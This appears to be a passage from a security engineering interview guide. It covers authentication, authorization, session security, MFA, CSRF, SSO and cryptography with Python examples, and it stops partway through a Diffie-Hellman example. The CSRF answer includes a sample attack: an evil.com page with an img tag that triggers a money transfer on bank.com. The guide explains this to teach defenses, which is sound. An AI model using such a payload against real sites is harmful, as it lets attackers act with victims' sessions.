🔐 Security OAuth · Cryptography Zero-Trust · OWASP ~85 questions

Security Engineering

A complete set of senior-level security engineering interview questions covering authentication and authorization, cryptography fundamentals, OAuth 2.0 and OIDC, JWT pitfalls, web application security, TLS and network security, secrets management, zero-trust architecture, threat modeling, and secure development practices.


Authentication & Authorization

8 questions

1. What is the difference between authentication and authorization? What are common models for each?

Authentication (AuthN) — verifying identity: "Who are you?" Establishes that the entity is who they claim to be.

Authorization (AuthZ) — verifying permissions: "What are you allowed to do?" Determines what actions an authenticated identity may perform.

Authentication factors:

Something you know: password, PIN, security questions
Something you have: TOTP app, hardware key (YubiKey), SMS code
Something you are: fingerprint, face ID, retina scan
MFA: combining two or more factors — the gold standard for sensitive systems

Authorization models:

DAC (Discretionary Access Control): resource owners grant access. POSIX file permissions. Flexible but hard to audit at scale.
MAC (Mandatory Access Control): system-enforced labels (Top Secret, Secret, Unclassified). Used in military/government. SELinux.
RBAC (Role-Based Access Control): permissions attached to roles, users assigned to roles. Most common in enterprise apps. Admin, Editor, Viewer.
ABAC (Attribute-Based Access Control): policies based on attributes of user, resource, and environment. "Allow access if user.department == resource.owner_dept AND time is business_hours." More expressive but complex.
ReBAC (Relationship-Based Access Control): access based on relationship graph. Google Zanzibar model. "User can edit doc if they are the owner or have editor relation to it." Used in Google Drive, GitHub.
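Here is a minimal in-memory sketch of the ReBAC idea. It assumes Zanzibar-style relation tuples `(object, relation, user)` and a hypothetical rule that `owner` implies `editor` and `editor` implies `viewer`. The names `IMPLIES`, `implied_relations`, and `check` are illustrative only. Production systems such as Zanzibar, SpiceDB, or OpenFGA also handle group membership, nested objects, and consistency.

```python
from typing import Dict, Set, Tuple

# Hypothetical relation tuples, Zanzibar style: (object, relation, user).
RelationTuple = Tuple[str, str, str]

# Hypothetical rewrite rules: holding the key relation also grants the listed ones.
IMPLIES: Dict[str, Set[str]] = {
    "owner": {"editor"},
    "editor": {"viewer"},
}


def implied_relations(relation: str) -> Set[str]:
    """Return `relation` plus every relation it grants transitively."""
    seen: Set[str] = set()
    stack = [relation]
    while stack:
        current = stack.pop()
        if current not in seen:
            seen.add(current)
            stack.extend(IMPLIES.get(current, set()))
    return seen


def check(tuples: Set[RelationTuple], obj: str, relation: str, user: str) -> bool:
    """True if `user` has `relation` on `obj`, directly or through an implying relation."""
    return any(
        o == obj and u == user and relation in implied_relations(r)
        for (o, r, u) in tuples
    )


tuples = {
    ("doc:roadmap", "owner", "alice"),
    ("doc:roadmap", "viewer", "bob"),
}
print(check(tuples, "doc:roadmap", "editor", "alice"))  # True: owner implies editor
print(check(tuples, "doc:roadmap", "editor", "bob"))    # False: viewer does not imply editor
```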

2. How should passwords be stored securely? What makes bcrypt, Argon2, and scrypt appropriate?

Passwords must never be stored in plaintext or as reversible encrypted values. They must be stored as one-way hashes designed to be computationally expensive to crack.

What NOT to use: MD5, SHA-1, SHA-256 — fast hashes designed for integrity checking, not password storage. A GPU can compute billions per second. A stolen hash database can be cracked with rainbow tables or brute force.

Requirements for password hashing:

Slow by design: each verification should take ~100ms — acceptable for login, catastrophic for attackers running millions of guesses
Salt: unique random value per user concatenated before hashing — prevents rainbow table attacks and ensures two users with the same password have different hashes
Memory-hard: requires significant RAM to compute, which raises the cost of GPU/ASIC attacks because those devices have little fast memory per parallel core

# Python: always use a modern library, never roll your own
import bcrypt                          # pip install bcrypt
from argon2 import PasswordHasher      # pip install argon2-cffi

password = "correct horse battery staple"

# bcrypt: adaptive, work factor configurable (rounds=12 means 2^12 iterations)
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
bcrypt.checkpw(password.encode(), hashed)  # True/False

# Argon2id: OWASP's first choice; winner of the Password Hashing Competition, memory-hard
# memory_cost is in KiB (65536 KiB = 64 MiB, above OWASP's 19 MiB minimum)
ph = PasswordHasher(time_cost=2, memory_cost=65536, parallelism=1)
stored = ph.hash(password)
ph.verify(stored, password)   # returns True, raises VerifyMismatchError if wrong

# OWASP Password Storage Cheat Sheet (minimum settings):
# 1st choice: Argon2id (m=19 MiB, t=2, p=1)
# 2nd choice: scrypt (N=2^17, r=8, p=1)
# 3rd choice: bcrypt (work factor 10 minimum; note its 72-byte input limit)
# FIPS-140 environments: PBKDF2-HMAC-SHA256 (600,000 iterations)

Pepper: A server-side secret mixed into every password before hashing (appended, or applied as an HMAC key). Unlike the salt (stored with the hash), the pepper is stored separately (env var / secrets manager). If the database is compromised but the application server isn't, the attacker cannot run an offline brute-force attack, because every guess also requires the unknown pepper.
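A dependency-free sketch of salt plus pepper, assuming the pepper is loaded from outside the database. It swaps in the standard library's PBKDF2 for Argon2id so it runs without extra packages, and applies the pepper as an HMAC key rather than by literal appending (a common variant). `PEPPER`, `hash_password`, and `verify_password` are hypothetical names.

```python
import hashlib
import hmac
import os
from typing import Tuple

# ASSUMPTION: in production the pepper is loaded from a secrets manager or env var
# and never stored in the database. A literal is used here only for illustration.
PEPPER = b"demo-pepper-do-not-hardcode"


def _pepper(password: str) -> bytes:
    # Mix the pepper in with HMAC-SHA256 (a common variant of simply appending it).
    return hmac.new(PEPPER, password.encode("utf-8"), hashlib.sha256).digest()


def hash_password(password: str, iterations: int = 600_000) -> Tuple[bytes, bytes]:
    """Return (salt, digest). The salt is stored next to the digest; the pepper is not."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", _pepper(password), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = 600_000) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", _pepper(password), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison
```

Only `salt` and `digest` are written to the database, so a database dump alone is not enough to test password guesses.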

3. What is RBAC and how do you implement it at scale? What are its limitations vs ABAC?

RBAC assigns permissions to roles rather than directly to users. Users are then assigned to roles. This indirection makes permission management tractable at scale — you change a role, not thousands of user records.

# Core RBAC tables:
# users(id, email, ...)
# roles(id, name)              -- admin, editor, viewer, billing_manager
# permissions(id, resource, action)  -- "posts", "create"
# user_roles(user_id, role_id)
# role_permissions(role_id, permission_id)

# Check permission (db is your query helper; $1-style placeholders are Postgres syntax):
def has_permission(user_id, resource, action):
    row = db.query("""
        SELECT 1 FROM user_roles ur
        JOIN role_permissions rp ON rp.role_id = ur.role_id
        JOIN permissions p ON p.id = rp.permission_id
        WHERE ur.user_id = $1
          AND p.resource = $2
          AND p.action = $3
        LIMIT 1
    """, user_id, resource, action).fetchone()
    return row is not None   # rowcount is unreliable for SELECT in many drivers

# Hierarchical RBAC: roles inherit from parent roles
# admin > editor > viewer (admin has all editor + viewer perms)

# Scoped RBAC: role applies only within a scope (org, project, team)
# user_roles(user_id, role_id, scope_type, scope_id)
# "Alice is admin of org:123 but viewer of org:456"

RBAC limitations:

Role explosion: Fine-grained needs lead to hundreds of roles that become unmanageable
Context blindness: Can't express "can read this document only during business hours" or "can approve only purchases under $10K"
Static: Can't express dynamic conditions based on resource attributes

ABAC adds: arbitrary policy conditions on user attributes (department, clearance), resource attributes (classification, owner), and environmental attributes (time, IP, location). More powerful but policy management is complex — use Open Policy Agent (OPA) or Cedar for policy-as-code.
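The example policy from the ABAC bullet can be written as a plain function. This is a sketch under stated assumptions: `User`, `Resource`, and `can_access` are hypothetical, and "business hours" is assumed to mean Monday to Friday, 09:00 to 17:00 local time. A policy engine such as OPA or Cedar would express the same rule declaratively and keep it out of application code.

```python
from dataclasses import dataclass
from datetime import datetime, time


@dataclass
class User:
    department: str


@dataclass
class Resource:
    owner_dept: str


# ASSUMPTION: "business hours" means Monday-Friday, 09:00-17:00 local time.
OPEN, CLOSE = time(9, 0), time(17, 0)


def is_business_hours(now: datetime) -> bool:
    return now.weekday() < 5 and OPEN <= now.time() < CLOSE


def can_access(user: User, resource: Resource, now: datetime) -> bool:
    """Allow if user.department == resource.owner_dept AND time is business hours."""
    return user.department == resource.owner_dept and is_business_hours(now)


alice = User(department="finance")
ledger = Resource(owner_dept="finance")
print(can_access(alice, ledger, datetime(2024, 1, 3, 10, 0)))  # Wednesday 10:00 -> True
print(can_access(alice, ledger, datetime(2024, 1, 6, 10, 0)))  # Saturday 10:00 -> False
```

Note that the decision depends on an environmental attribute (`now`) that no role assignment could capture.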

4. What is session management? How do you design secure sessions and prevent fixation/hijacking?

# Secure session design (Flask-style request/response objects assumed):
import json
import secrets
import time

import redis
from flask import request

r = redis.Redis()   # connection to the session store

def create_session(user_id):
    session_id = secrets.token_urlsafe(32)   # 32 random bytes = 256 bits of entropy
    session_data = {
        "user_id": user_id,
        "created_at": time.time(),
        "ip": request.remote_addr,           # optional: bind to IP
        "user_agent": request.user_agent.string,
    }
    r.setex(f"session:{session_id}", 3600, json.dumps(session_data))  # 1hr TTL
    return session_id

# Set cookie with all security flags (response is the Flask response object):
response.set_cookie(
    "session_id",
    value=session_id,
    httponly=True,    # JS cannot read — prevents XSS theft
    secure=True,      # HTTPS only
    samesite="Lax",   # CSRF protection
    max_age=3600,
    path="/",
)

Session fixation attack: Attacker sets a known session ID before victim logs in (via URL parameter or cookie injection). After login, attacker uses the known ID. Fix: Always regenerate the session ID after login.
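A minimal sketch of the fix, using an in-memory dict in place of Redis. `SESSIONS`, `new_session`, and `login` are hypothetical names; the point is that the pre-login ID is deleted and a new random ID is issued the moment authentication succeeds.

```python
import secrets
import time
from typing import Any, Dict

# In-memory stand-in for the Redis session store (illustration only).
SESSIONS: Dict[str, Dict[str, Any]] = {}


def new_session(data: Dict[str, Any]) -> str:
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = data
    return session_id


def login(pre_login_session_id: str, user_id: int) -> str:
    """Issue a fresh session ID at login and destroy the old one.

    An ID the attacker planted before login is deleted here, so it never
    becomes an authenticated session.
    """
    data = SESSIONS.pop(pre_login_session_id, {})   # invalidate the old ID
    data = {**data, "user_id": user_id, "authenticated_at": time.time()}
    return new_session(data)                         # send this ID in Set-Cookie
```

Carrying over harmless pre-login state (such as a shopping cart) is optional; what matters is that the old ID no longer resolves to anything.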

Session hijacking: Stealing an active session cookie via XSS, network sniffing, or log exposure. Mitigations: HttpOnly + Secure cookie flags; HSTS; rotate session IDs after privilege escalation; bind sessions to IP/user-agent (trade-off vs usability); short TTLs with sliding expiry; re-authenticate for sensitive operations.

Absolute vs sliding timeout: Absolute timeout invalidates the session regardless of activity (e.g., 8 hours). Sliding timeout resets on each request (e.g., 30 min of inactivity). Use both for sensitive applications.
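Combining both timeouts is a short check. This sketch assumes each session record stores `created_at` and `last_seen` as Unix timestamps (hypothetical field names) and uses the 8-hour and 30-minute limits from the text.

```python
import time
from typing import Dict, Optional

ABSOLUTE_TIMEOUT = 8 * 60 * 60   # 8 hours after login, regardless of activity
IDLE_TIMEOUT = 30 * 60           # 30 minutes without a request (sliding)


def is_session_valid(session: Dict[str, float], now: Optional[float] = None) -> bool:
    now = time.time() if now is None else now
    if now - session["created_at"] > ABSOLUTE_TIMEOUT:
        return False          # hard cap reached
    if now - session["last_seen"] > IDLE_TIMEOUT:
        return False          # idle too long
    return True


def touch(session: Dict[str, float], now: Optional[float] = None) -> None:
    """Sliding expiry: call on every accepted request to reset the idle clock."""
    session["last_seen"] = time.time() if now is None else now
```

Activity keeps extending the idle window, but no amount of activity moves `created_at`, so the absolute cap still applies.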

5. What is multi-factor authentication (MFA)? Compare TOTP, FIDO2/WebAuthn, and SMS.

TOTP (Time-based One-Time Password, RFC 6238): A shared secret generates a 6-digit code every 30 seconds using HMAC-SHA1 (the default). Used by Google Authenticator, Authy. Each code is valid only for its short time window, which limits replay; servers should also reject a code that has already been accepted. Vulnerable to real-time phishing (attacker relays your code immediately). Theft of the shared secret compromises all future codes.

# TOTP verification:
import pyotp
secret = pyotp.random_base32()   # stored securely per user at enrollment
totp = pyotp.TOTP(secret)
totp.now()                       # current code
totp.verify("123456", valid_window=1)   # True/False; valid_window=1 also accepts the adjacent 30s steps (clock drift)
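To show what a TOTP library does under the hood, here is a standard-library sketch of RFC 4226 HOTP and RFC 6238 TOTP (HMAC-SHA1, 30-second steps). It takes raw key bytes; a base32 secret like the one `pyotp.random_base32()` returns would first be decoded with `base64.b32decode`. The function names are illustrative, and the sketch does not implement replay protection (remembering the last accepted time step per user).

```python
import hashlib
import hmac
import struct
import time
from typing import Optional


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over an 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # low nibble of last byte
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, t: Optional[float] = None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step)."""
    t = time.time() if t is None else t
    return hotp(key, int(t // step), digits)


def verify_totp(key: bytes, code: str, t: Optional[float] = None,
                step: int = 30, window: int = 1) -> bool:
    """Accept codes from `window` steps either side of now to tolerate clock drift."""
    t = time.time() if t is None else t
    return any(
        hmac.compare_digest(totp(key, t + i * step, step, len(code)), code)
        for i in range(-window, window + 1)
    )
```

With the RFC 6238 test key `b"12345678901234567890"`, `totp(key, 59, digits=8)` returns `"94287082"`, matching the RFC's SHA-1 test vector.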

FIDO2/WebAuthn (the gold standard): Cryptographic challenge-response using public key cryptography. The authenticator (hardware key like YubiKey, or platform authenticator like Touch ID) holds a private key that never leaves the device. The server stores only the public key.

Phishing-resistant: The challenge is bound to the origin (website domain) — a fake site gets a response that won't work on the real site
No shared secret: Nothing to steal from the server
Passkeys: WebAuthn credentials synced via iCloud/Google — passwordless AND phishing-resistant
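Origin binding is visible in the `clientDataJSON` the browser hands to the authenticator. The sketch below checks only its `type`, `challenge`, and `origin` fields. It assumes the server stored the challenge it issued, and it deliberately omits the essential signature check over the authenticator data and the hash of `clientDataJSON`; use a maintained WebAuthn library for the full verification.

```python
import base64
import json


def b64url_decode(value: str) -> bytes:
    """Decode unpadded base64url, as used in WebAuthn clientDataJSON."""
    return base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))


def check_client_data(client_data_json: bytes, expected_challenge: bytes,
                      expected_origin: str, expected_type: str = "webauthn.get") -> bool:
    """Check the type, challenge, and origin fields of clientDataJSON.

    This is only one step of assertion verification: a real server must also
    verify the authenticator's signature over authenticatorData || SHA-256(clientDataJSON)
    with the stored public key.
    """
    data = json.loads(client_data_json)
    return (
        data.get("type") == expected_type
        and data.get("origin") == expected_origin
        and b64url_decode(data.get("challenge", "")) == expected_challenge
    )
```

Because the browser, not the page, fills in `origin`, a look-alike phishing domain produces client data that fails this check even if the user is fooled.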

SMS OTP (weakest): Code sent via text message. Vulnerable to: SIM swapping (attacker convinces carrier to transfer your number), SS7 protocol interception, phone number porting attacks. NIST SP 800-63B classifies SMS/PSTN OTP as a "restricted" authenticator, which requires services that use it to offer at least one non-restricted alternative. Better than nothing for consumer apps, not acceptable for high-value accounts.

Recommendation hierarchy: FIDO2/Passkeys > TOTP app > Push notification (Duo) > Email OTP > SMS OTP > Security questions (avoid entirely).

6. What is the principle of least privilege? How do you implement it in a real system?

The principle of least privilege (PoLP) states that any entity (user, service, process) should have only the minimum permissions required to perform its function, and nothing more. Limits the blast radius of any compromise.

Implementation at different layers:

Database: Application user has SELECT/INSERT/UPDATE but not DROP/CREATE/ALTER. Separate read-only replicas for analytics. Each microservice has its own DB user scoped to its tables only.
IAM / Cloud: Service accounts scoped to specific resources and actions. No wildcard * permissions. AWS IAM: use resource ARNs in policies, not arn:aws:s3:::*. Enable SCPs (Service Control Policies) at org level.
OS: Services run as non-root users. Containers drop all Linux capabilities except those needed. seccomp profiles restrict system calls.
API keys: Scoped to specific operations. Read-only tokens for read-only consumers. Separate keys per integration.

# AWS IAM: least-privilege policy document
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:PutObject"],
      "Resource": "arn:aws:s3:::my-app-uploads/*"
    }
  ]
}
# NOT: "Action": ["s3:*"], "Resource": "*"
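Wildcards like the one in the NOT example are easy to catch automatically. This hypothetical `find_wildcards` helper is a sketch, not an AWS tool: it only flags bare `*` resources and `*` or `service:*` actions in Allow statements, and ignores `NotAction`, conditions, and partial wildcards.

```python
import json
from typing import List


def _as_list(value) -> list:
    # IAM allows either a single string or a list for Action/Resource.
    return [value] if isinstance(value, str) else list(value or [])


def find_wildcards(policy_json: str) -> List[str]:
    """Flag Allow statements whose Action or Resource is a bare wildcard.

    Hypothetical helper for illustration; it does not understand NotAction,
    Conditions, or partial wildcards such as "s3:Get*".
    """
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):          # a single statement may be an object
        statements = [statements]
    findings = []
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        for action in _as_list(stmt.get("Action")):
            if action == "*" or action.endswith(":*"):
                findings.append(f"Statement {i}: wildcard action {action!r}")
        for resource in _as_list(stmt.get("Resource")):
            if resource == "*":
                findings.append(f"Statement {i}: wildcard resource {resource!r}")
    return findings
```

A check like this fits naturally in CI, so over-broad policies are rejected before they are deployed.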

# Kubernetes — non-root, read-only filesystem:
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  readOnlyRootFilesystem: true
  allowPrivilegeEscalation: false
  capabilities:
    drop: ["ALL"]

Just-in-time (JIT) access: Grant elevated access only when needed, for a bounded time. Better than standing admin privileges. Implemented by tools like HashiCorp Boundary, AWS IAM Identity Center, CyberArk.

7. What is CSRF and how do you defend against it? When is a SameSite cookie enough?

CSRF (Cross-Site Request Forgery): An attacker tricks a victim's browser into making an authenticated request to a target site. The browser automatically includes cookies, so a malicious page at evil.com can trigger a POST to bank.com using the victim's session.

# Attack scenario:
# Victim is logged into bank.com (session cookie set)
# Victim visits evil.com which contains:
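# <img src="https://bank.com/transfer?to=attacker&amount=10000">
# or <form action="https://bank.com/transfer" method="POST">...</form> with a script that auto-submits it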

# Defense 1: CSRF tokens (classic, always works)
# Server generates a random token, stored in session AND sent in form/header
# On every state-changing request, verify token matches
import secrets
import redis

r = redis.Redis(decode_responses=True)   # return str, not bytes, so the comparison works

def generate_csrf_token(session_id):
    token = secrets.token_urlsafe(32)
    r.set(f"csrf:{session_id}", token, ex=3600)
    return token

def verify_csrf(session_id, token):
    stored = r.get(f"csrf:{session_id}")
    if not stored or not token:
        return False
    return secrets.compare_digest(stored, token)   # constant-time comparison

# In form: <input type="hidden" name="csrf_token" value="...">
# In AJAX: X-CSRF-Token header
# Server validates on every POST/PUT/DELETE/PATCH

# Defense 2: SameSite cookies
Set-Cookie: session=abc123; SameSite=Strict  # never sent cross-site
Set-Cookie: session=abc123; SameSite=Lax     # sent only on top-level navigation GETs

When is SameSite=Lax enough? For most modern web apps where you control the full authentication flow, SameSite=Lax prevents CSRF because the browser does not attach the cookie to cross-site POST/PUT/DELETE requests. Chromium-based browsers also apply Lax by default to cookies that omit the attribute, but set it explicitly, since other browsers differ. You still need explicit CSRF tokens if: you support older browsers that ignore SameSite; you use GET requests for state changes (avoid this); or sibling subdomains are a concern, since a.example.com counts as the same site as b.example.com and can also set cookies for .example.com.

8. What is SSO (Single Sign-On)? How does SAML work and how does it compare to OIDC?

SSO allows users to authenticate once and access multiple applications without re-entering credentials. The identity is asserted by a central Identity Provider (IdP) to multiple Service Providers (SPs).

SAML 2.0 (Security Assertion Markup Language): XML-based protocol, enterprise-focused, introduced in 2005. The IdP issues signed XML assertions. Primarily used for web browser SSO in enterprise contexts (Okta, Azure AD, ADFS).

SAML SP-initiated flow:

User accesses SP (app.company.com)
SP redirects to IdP with AuthnRequest
IdP authenticates user (login page)
IdP POSTs signed SAML Response (XML) to SP's ACS URL
SP validates signature, extracts user attributes, creates session

OIDC vs SAML:

Format: OIDC uses JSON/JWT; SAML uses XML — OIDC is simpler to parse and implement
Transport: OIDC uses REST APIs; SAML uses HTTP redirects/POST with XML documents
Mobile/API: OIDC works naturally for SPAs, mobile apps, and API-to-API auth; SAML is built around browser redirects and form POSTs, which makes it awkward outside the browser
Modern preference: OIDC for new consumer and developer-facing apps; SAML still required for enterprise legacy integrations
Key similarity: Both use a central IdP, both issue signed assertions, both support attribute passing

Cryptography Fundamentals

9 questions

1. What is the difference between symmetric and asymmetric encryption? When do you use each?

Symmetric encryption: Same key for encryption and decryption. Fast (orders of magnitude faster than asymmetric for bulk data). Key distribution problem: how do you securely share the secret key?

Asymmetric encryption: Public key encrypts, private key decrypts (or: private key signs, public key verifies). Solves the key distribution problem — publish your public key freely. Computationally expensive.

In practice — hybrid encryption (best of both): TLS, PGP, and Signal all use this pattern:

Use asymmetric crypto to establish/exchange a symmetric key securely
Use symmetric crypto for the bulk data encryption

# Symmetric: AES-256-GCM (authenticated encryption):
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

plaintext = b"account=42; amount=100"
associated_data = b"header-v1"                 # authenticated, not encrypted

key = AESGCM.generate_key(bit_length=256)    # 32 bytes
nonce = os.urandom(12)                        # 96-bit nonce, unique per message
aesgcm = AESGCM(key)
ciphertext = aesgcm.encrypt(nonce, plaintext, associated_data)
plaintext   = aesgcm.decrypt(nonce, ciphertext, associated_data)
# GCM = Galois/Counter Mode: provides both confidentiality AND integrity
# NEVER reuse a nonce with the same key — catastrophic for GCM

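# Asymmetric: RSA-OAEP
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

message = os.urandom(32)   # e.g., a 256-bit symmetric key to wrap
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()), algorithm=hashes.SHA256(), label=None)
ciphertext = key.public_key().encrypt(message, oaep)
assert key.decrypt(ciphertext, oaep) == message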
# Use for encrypting small data (e.g., a symmetric key)
# RSA-2048 can encrypt at most 190 bytes with OAEP-SHA256

Use symmetric for: bulk data encryption, database field encryption, file encryption. Use asymmetric for: key exchange, digital signatures, certificate-based authentication.

2. What is AES-GCM and why is it preferred over AES-CBC? What makes it "authenticated encryption"?

AES-CBC (Cipher Block Chaining): Encrypts in blocks, each block XORed with the previous ciphertext block. Provides confidentiality only — an attacker can flip bits in the ciphertext and predictably corrupt/modify the plaintext without detection. Requires separate MAC (HMAC) for integrity — easy to get wrong (encrypt-then-MAC vs MAC-then-encrypt ordering mistakes).

AES-GCM (Galois/Counter Mode): Combines CTR mode encryption (stream cipher from a counter) with GHASH authentication. Provides both confidentiality AND integrity (AEAD — Authenticated Encryption with Associated Data) in a single primitive.

# AES-GCM properties:
# - Authentication tag (128 bits): any ciphertext modification detected on decrypt
# - Associated Data (AAD): headers/metadata authenticated but not encrypted
#   (e.g., "to: Alice, from: Bob" authenticated but readable)
# - Nonce (IV): 96-bit recommended, must be UNIQUE per (key, message) pair
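# - If nonce is reused: catastrophic. The attacker learns the XOR of the two plaintexts
#   and can recover the GHASH authentication key, letting them forge messages

# Padding oracle attacks on CBC:
# CBC requires padding to fill the last block (PKCS#7)
# If the server reveals whether padding was valid (e.g., a distinct "padding error") → attacker can decrypt
# GCM encrypts with CTR mode, a stream construction: no padding needed, no padding oracle

# TLS 1.3 cipher suites are all AEAD (TLS_AES_128_GCM_SHA256 is mandatory to implement):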
# TLS_AES_128_GCM_SHA256
# TLS_AES_256_GCM_SHA384
# TLS_CHACHA20_POLY1305_SHA256  ← ChaCha20-Poly1305: AES alternative, fast without HW acceleration

# Nonce management strategy for AES-GCM:
# Option 1: random 96-bit nonce (safe up to ~2^32 messages per key — birthday problem)
# Option 2: deterministic counter (guarantees uniqueness — better for high volume)
# Option 3: AES-GCM-SIV (nonce-misuse resistant — tolerates nonce reuse at cost of performance)
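Option 2 can be sketched as a 12-byte nonce made of a 4-byte fixed field (for example, a per-device ID) followed by an 8-byte counter, along the lines of the deterministic IV construction described in NIST SP 800-38D. `CounterNonce` is a hypothetical class, and persisting the counter across restarts is left out, which is exactly where real deployments tend to go wrong.

```python
import threading


class CounterNonce:
    """Deterministic 96-bit GCM nonces: 4-byte fixed field || 8-byte counter.

    The fixed field should be unique per device or process sharing a key.
    The counter must never restart under the same key (persist it, or rotate
    the key on restart); otherwise nonces repeat.
    """

    def __init__(self, fixed_field: bytes) -> None:
        if len(fixed_field) != 4:
            raise ValueError("fixed field must be exactly 4 bytes")
        self._fixed = fixed_field
        self._counter = 0
        self._lock = threading.Lock()       # safe to share across threads

    def next_nonce(self) -> bytes:
        with self._lock:
            if self._counter >= 2 ** 64:
                raise OverflowError("nonce space exhausted; rotate the key")
            value = self._counter
            self._counter += 1
        return self._fixed + value.to_bytes(8, "big")
```

Each value from `next_nonce()` would be passed as the `nonce` argument to `AESGCM.encrypt`, exactly where `os.urandom(12)` is used in the earlier example.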

3. How do digital signatures work? What is the difference between signing and encrypting?

Signing: Proves authenticity and integrity. "This message came from me (private key holder) and hasn't been modified." Private key signs, public key verifies.

Encrypting: Provides confidentiality. "Only the recipient can read this." Public key encrypts, private key decrypts.

# How signing works:
# 1. Hash the message: h = SHA-256(message)
# 2. Sign the hash: sig = RSA_sign(private_key, h)  or  ECDSA_sign(private_key, h)
# 3. Send: (message, sig)
# Verification: h' = SHA-256(message); verify RSA_verify(public_key, sig) == h'

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import hashes

message = b"release v1.4.2"

# ECDSA signing (preferred over RSA for new systems — smaller keys, faster)
private_key = ec.generate_private_key(ec.SECP256R1())
signature = private_key.sign(message, ec.ECDSA(hashes.SHA256()))
private_key.public_key().verify(signature, message, ec.ECDSA(hashes.SHA256()))

# Ed25519: modern, fast, simple; signing is deterministic, so there is no per-signature random nonce to get wrong (preferred)
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
private_key = Ed25519PrivateKey.generate()
signature = private_key.sign(message)
private_key.public_key().verify(signature, message)

# Common confusion — you can combine both:
# Encrypted + Signed message:
# sig = sign(private_A, message)      # A signs
# ciphertext = encrypt(public_B, message || sig)  # encrypted for B
# B decrypts, gets message + sig, verifies sig with A's public key

Non-repudiation: Only the holder of the private key can produce a valid signature. The signer cannot later deny having signed the message — important for contracts, audit logs, code signing.

4. What is a cryptographic hash function? What properties must it have and what are they used for?

A cryptographic hash function maps arbitrary input to a fixed-size digest. Three required properties:

Pre-image resistance: Given h, it's computationally infeasible to find m such that H(m) = h. "One-way function."
Second pre-image resistance: Given m₁, infeasible to find m₂ ≠ m₁ such that H(m₁) = H(m₂).
Collision resistance: Infeasible to find any m₁ ≠ m₂ such that H(m₁) = H(m₂). Strongest property — collision resistance implies second pre-image resistance.

# Current recommendations (2024):
# SHA-256 (256-bit output): general purpose, widely used, still secure
# SHA-3 (Keccak): different design from SHA-2, good as backup/alternative
# BLAKE3: fastest, modern, secure — use for checksums and performance-sensitive work

# BROKEN (do not use for security):
# MD5: collisions trivially found (seconds on a laptop)
# SHA-1: collision demonstrated in 2017 (SHAttered attack)

import hashlib
data = b"example payload"
sha256 = hashlib.sha256(data).hexdigest()
sha3   = hashlib.sha3_256(data).hexdigest()

# Applications:
# File integrity: hash(file) → verify download not corrupted
# Digital signatures: sign(hash(message)) — avoid signing variable-length data
# Password storage: bcrypt/Argon2 (built on hash functions but slow by design)
# HMAC (message authentication): HMAC(key, message) — keyed hash for MAC
# Merkle trees: hash(hash(left) + hash(right)) — used in git, blockchain, certificate transparency
# Key derivation: HKDF (HMAC-based KDF) — derive multiple keys from one secret

Length extension attacks: SHA-256 (like other Merkle-Damgård hashes) is vulnerable to length extension: given H(m) and the length of m, an attacker can compute H(m‖padding‖extra) without knowing m. That makes H(key‖message) an unsafe MAC; use HMAC, whose nested two-pass construction blocks the attack. SHA-3 and BLAKE3 are immune to length extension.

5. What is Diffie-Hellman key exchange? How does ECDH work and why is forward secrecy important?

Diffie-Hellman allows two parties to establish a shared secret over an insecure channel without prior shared secrets. Neither party transmits the secret — they each contribute half and derive the same value.

# Diffie-Hellman (simplified):
# Public parameters: prime p, generator g
# Alice: private a, public A = g^a mod p
# Bob:   private b, public B = g^b mod p
# Both send their public values. Shared secret:
# Alice: S = B^a mod p = g^(ab) mod p
# Bob:   S = A^b mod p = g^(ab) mod p
# Attacker sees A and B but cannot compute g^(ab) — Discrete Log Problem

# ECDH (Elliptic Curve DH): same math, smaller keys
# 256-bit ECDH key ≈ 3072-bit DH in security level
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

alice_private = X25519PrivateKey.generate()
bob_private   = X25519PrivateKey.generate()

# Exchange public keys:
alice_public = alice_private.public_key()
bob_public   = bob_private.public_key()

# Compute shared secrets (identical):
alice_shared = alice_private.exchange(bob_public)
bob_shared   = bob_private.exchange(alice_public)
assert alice_shared == bob_shared  # True

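Perfect Forward Secrecy (PFS/FS): Use ephemeral DH keys: generate fresh DH key pairs for every session and discard them after use. Even if the server's long-term private key is compromised later, past session traffic cannot be decrypted, because that key only authenticated the handshake and was never used to derive session keys. Without PFS (e.g., static RSA key exchange), an attacker can capture all traffic now and decrypt it later after stealing the private key ("harvest now, decrypt later"). TLS 1.3 removed static RSA and static DH key exchange, so every full handshake uses ephemeral (EC)DHE; only the PSK-only resumption mode lacks forward secrecy.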
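The arithmetic can be checked with Python's built-in three-argument `pow`. The first half replays textbook numbers (p = 23, g = 5); the second half sketches the ephemeral pattern behind PFS, using a toy modulus (2^127 - 1, an assumption chosen only so the demo runs fast) that is not a vetted DH group.

```python
import secrets

# 1) Textbook arithmetic with tiny, insecure parameters: p = 23, g = 5.
p, g = 23, 5
a, b = 4, 3                      # Alice's and Bob's private exponents
A = pow(g, a, p)                 # 5^4 mod 23 = 4   (Alice sends A)
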